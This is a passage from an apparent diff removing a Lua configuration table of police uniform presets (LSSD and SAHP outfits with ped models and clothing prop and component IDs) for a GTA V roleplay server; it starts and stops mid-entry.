5, 54, 1 }, - } - }, - ['Female LSSD Motorcycle Class B'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 3 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 32, 3 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Female LSSD Motorcycle Class C'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 3 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 32, 3 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 54, 1 }, - } - }, - ['Male LSSD Bicycle Uniform'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 50, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 95, 3 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 38, 1 }, - { 4, 13, 2 }, - { 6, 3, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD Bicycle Uniform'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 48, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 86, 3 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 3, 1 }, - { 4, 15, 4 }, - { 6, 11, 1 }, - { 7, 9, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD Harbor Patrol'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 95, 3 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 88, 1 }, - { 4, 88, 8 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 26, 3 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD Harbor Patrol'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 86, 3 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 66, 1 }, - { 4, 91, 8 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 28, 3 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD Suit'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 5, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 11, 8 }, - { 4, 11, 1 }, - { 6, 11, 1 }, - { 7, 39, 5 }, - { 9, 24, 2 }, - { 5, 67, 1 }, - } - }, - ['Female LSSD Suit'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 25, 4 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 6 }, - { 4, 4, 2 }, - { 6, 30, 1 }, - { 7, 1, 1 }, - { 9, 21, 2 }, - { 5, 67, 1 }, - } - }, - ['Male LSSD Detective'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 13, 8 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 13, 5 }, - { 4, 11, 1 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 24, 2 }, - { 5, 1, 1 }, - } - }, - ['Female LSSD Detective'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 9, 8 }, - { 3, 6, 1 }, - { 10, 1, 1 }, - { 8, 5, 1 }, - { 4, 4, 5 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 26, 2 }, - { 5, 1, 1 }, - } - }, - ['Male LSSD Detective (Vest)'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 8 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 132, 4 }, - { 4, 11, 1 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 24, 2 }, - { 5, 1, 1 }, - } - }, - ['Female LSSD Detective (vest)'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 28, 5 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 162, 4 }, - { 4, 4, 2 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 26, 2 }, - { 5, 1, 1 }, - } - }, - ['Male LSSD Windbreaker'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 37, 5 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 12, 8 }, - { 4, 11, 1 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 24, 2 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD Windbreaker'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 169, 5 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 6 }, - { 4, 4, 2 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 21, 2 }, - { 5, 1, 1 }, - } - }, - ['Male LSSD Detective Winter'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 231, 2 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 12, 8 }, - { 4, 11, 1 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 24, 2 }, - { 5, 67, 1 }, - } - }, - ['Female LSSD Detective Winter'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 6, 2 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 165, 9 }, - { 3, 45, 1 }, - { 10, 1, 1 }, - { 8, 40, 6 }, - { 4, 4, 5 }, - { 6, 26, 1 }, - { 7, 1, 1 }, - { 9, 26, 2 }, - { 5, 67, 1 }, - } - }, - ['Male LSSD Task Force'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 11, 3 }, - }, - components = { - { 1, 122, 1 }, - { 11, 74, 19 }, - { 3, 31, 1 }, - { 10, 1, 1 }, - { 8, 116, 2 }, - { 4, 50, 4 }, - { 6, 64, 5 }, - { 7, 2, 1 }, - { 9, 8, 2 }, - { 5, 67, 1 }, - } - }, - ['Female LSSD Task Force'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 76, 1 }, - { 3, 35, 1 }, - { 10, 1, 1 }, - { 8, 82, 2 }, - { 4, 52, 5 }, - { 6, 56, 1 }, - { 7, 2, 1 }, - { 9, 8, 2 }, - { 5, 67, 1 }, - } - }, - ['Male LSSD K-9 Class B'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 100, 1 }, - { 3, 5, 1 }, - { 10, 12, 1 }, - { 8, 54, 1 }, - { 4, 88, 8 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD K-9 Class C'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 11, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 101, 1 }, - { 3, 1, 1 }, - { 10, 2, 1 }, - { 8, 54, 1 }, - { 4, 88, 8 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD K-9 Class B'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 91, 1 }, - { 3, 4, 1 }, - { 10, 11, 1 }, - { 8, 32, 2 }, - { 4, 91, 8 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD K-9 Class C'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 11, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 92, 1 }, - { 3, 15, 1 }, - { 10, 2, 1 }, - { 8, 32, 2 }, - { 4, 91, 8 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD Dirt bike patrol'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 17, 2 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 153, 2 }, - { 3, 18, 1 }, - { 10, 1, 1 }, - { 8, 56, 1 }, - { 4, 68, 1 }, - { 6, 48, 4 }, - { 7, 2, 1 }, - { 9, 13, 3 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD Dirtbike Unit'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 17, 2 }, - { 1, 28, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 150, 2 }, - { 3, 19, 1 }, - { 10, 1, 1 }, - { 8, 33, 1 }, - { 4, 70, 11 }, - { 6, 49, 4 }, - { 7, 2, 1 }, - { 9, 12, 3 }, - { 5, 1, 1 }, - } - }, - ['Male LSSD Riot Gear'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 126, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 100, 1 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 39, 2 }, - { 4, 88, 8 }, - { 6, 25, 1 }, - { 7, 2, 1 }, - { 9, 13, 3 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD Riot Gear'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 125, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 91, 1 }, - { 3, 40, 1 }, - { 10, 1, 1 }, - { 8, 52, 2 }, - { 4, 91, 8 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 12, 3 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD SWAT Uniform'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 60, 2 }, - { 1, 24, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 50, 2 }, - { 3, 97, 1 }, - { 10, 5, 1 }, - { 8, 16, 1 }, - { 4, 32, 2 }, - { 6, 36, 1 }, - { 7, 111, 1 }, - { 9, 28, 2 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD SWAT Uniform'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 60, 2 }, - { 1, 26, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 43, 2 }, - { 3, 112, 1 }, - { 10, 5, 1 }, - { 8, 16, 1 }, - { 4, 31, 2 }, - { 6, 37, 1 }, - { 7, 82, 1 }, - { 9, 30, 2 }, - { 5, 49, 1 }, - } - }, - ['Male LSSD Pilot Uniform'] = { - category = 'LSSD', - ped = 'mp_m_freemode_01', - props = { - { 0, 80, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 66, 3 }, - { 3, 97, 1 }, - { 10, 9, 2 }, - { 8, 44, 2 }, - { 4, 39, 3 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Female LSSD Pilot Uniform'] = { - category = 'LSSD', - ped = 'mp_f_freemode_01', - props = { - { 0, 79, 1 }, - { 1, 14, 1 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 60, 3 }, - { 3, 37, 1 }, - { 10, 8, 2 }, - { 8, 31, 2 }, - { 4, 39, 3 }, - { 6, 25, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 49, 1 }, - } - }, - ['Male SAHP Class A'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 14, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 5 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 26, 2 }, - { 6, 16, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Male SAHP Class B'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 5 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 26, 2 }, - { 6, 16, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 56, 1 }, - } - }, - ['Male SAHP Class C'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 5 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 26, 2 }, - { 6, 16, 1 }, - { 7, 9, 1 }, - { 9, 14, 1 }, - { 5, 56, 1 }, - } - }, - ['Male SAHP CVE Class B'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 33, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 87, 12 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Male SAHP CVE Class C'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 32, 1 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 87, 12 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female SAHP Class A'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 14, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 5 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 42, 3 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Female SAHP Class B'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 5 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 42, 3 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Female SAHP Class C'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 5 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 42, 3 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Female SAHP CVE Class B'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 32, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 90, 12 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female SAHP CVE Class C'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 34, 1 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 90, 12 }, - { 6, 26, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male SAHP Jacket'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 104, 1 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 3 }, - { 4, 26, 2 }, - { 6, 16, 1 }, - { 7, 9, 1 }, - { 9, 2, 1 }, - { 5, 49, 1 }, - } - }, - ['Female SAHP Jacket'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 95, 1 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 3 }, - { 4, 42, 3 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 2, 4 }, - { 5, 49, 1 }, - } - }, - ['Male SAHP Winter Uniform'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 9, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 18, 4 }, - { 3, 39, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 26, 2 }, - { 6, 16, 1 }, - { 7, 9, 1 }, - { 9, 27, 3 }, - { 5, 49, 1 }, - } - }, - ['Female SAHP Winter Uniform'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 9, 3 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 22, 4 }, - { 3, 37, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 42, 3 }, - { 6, 53, 1 }, - { 7, 9, 1 }, - { 9, 29, 3 }, - { 5, 49, 1 }, - } - }, - ['Male SAHP Raincoat'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 190, 10 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 66, 3 }, - { 4, 26, 2 }, - { 6, 52, 1 }, - { 7, 1, 1 }, - { 9, 34, 1 }, - { 5, 56, 1 }, - } - }, - ['Female SAHP Raincoat'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 192, 10 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 46, 3 }, - { 4, 42, 3 }, - { 6, 53, 1 }, - { 7, 1, 1 }, - { 9, 38, 1 }, - { 5, 1, 1 }, - } - }, - ['Male SAHP Motorcycle Class A'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 201, 5 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 33, 1 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Male SAHP Motorcycle Class B'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 194, 5 }, - { 3, 21, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 33, 1 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Male SAHP Motorcycle Class C'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 18, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 191, 5 }, - { 3, 20, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 33, 1 }, - { 6, 14, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Female SAHP Motorcycle Class A'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 203, 5 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 32, 1 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Female SAHP Motorcycle Class B'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 196, 5 }, - { 3, 24, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 32, 1 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Female SAHP Motorcycle Class C'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 18, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 193, 5 }, - { 3, 32, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 32, 1 }, - { 6, 10, 1 }, - { 7, 9, 1 }, - { 9, 1, 1 }, - { 5, 56, 1 }, - } - }, - ['Male SAHP K-9 Class B'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 33, 5 }, - { 3, 5, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 88, 12 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Male SAHP K-9 Class C'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 45, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 32, 5 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 54, 1 }, - { 4, 88, 12 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 15, 1 }, - { 5, 49, 1 }, - } - }, - ['Female SAHP K-9 Class B'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 32, 4 }, - { 3, 4, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 91, 12 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Female SAHP K-9 Class C'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 44, 1 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 34, 4 }, - { 3, 15, 1 }, - { 10, 1, 1 }, - { 8, 28, 2 }, - { 4, 91, 12 }, - { 6, 26, 1 }, - { 7, 2, 1 }, - { 9, 1, 1 }, - { 5, 1, 1 }, - } - }, - ['Male SAHP Inspector'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 13 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 89, 1 }, - { 4, 11, 1 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 24, 3 }, - { 5, 1, 1 }, - } - }, - ['Male SAHP Inspector (Vest)'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 4, 13 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 132, 2 }, - { 4, 11, 1 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 24, 3 }, - { 5, 1, 1 }, - } - }, - ['Female SAHP Inspector'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 28, 5 }, - { 3, 1, 1 }, - { 10, 1, 1 }, - { 8, 8, 1 }, - { 4, 4, 5 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 26, 3 }, - { 5, 1, 1 }, - } - }, - ['Male SAHP Windbreaker'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 37, 6 }, - { 3, 13, 1 }, - { 10, 1, 1 }, - { 8, 12, 13 }, - { 4, 11, 1 }, - { 6, 11, 1 }, - { 7, 7, 1 }, - { 9, 24, 3 }, - { 5, 49, 1 }, - } - }, - ['Female SAHP Windbreaker'] = { - category = 'SAHP', - ped = 'mp_f_freemode_01', - props = { - { 0, 0, 0 }, - { 1, 0, 0 }, - { 2, 0, 0 }, - { 6, 0, 0 }, - }, - components = { - { 1, 1, 1 }, - { 11, 169, 6 }, - { 3, 8, 1 }, - { 10, 1, 1 }, - { 8, 40, 14 }, - { 4, 4, 2 }, - { 6, 30, 1 }, - { 7, 7, 1 }, - { 9, 26, 3 }, - { 5, 1, 1 }, - } - }, - ['Male SAHP Inspector Winter'] = { - category = 'SAHP', - ped = 'mp_m_freemode_01', - props = { - { 0, 3, 2 }, - { 1, 0, 0 }, - { 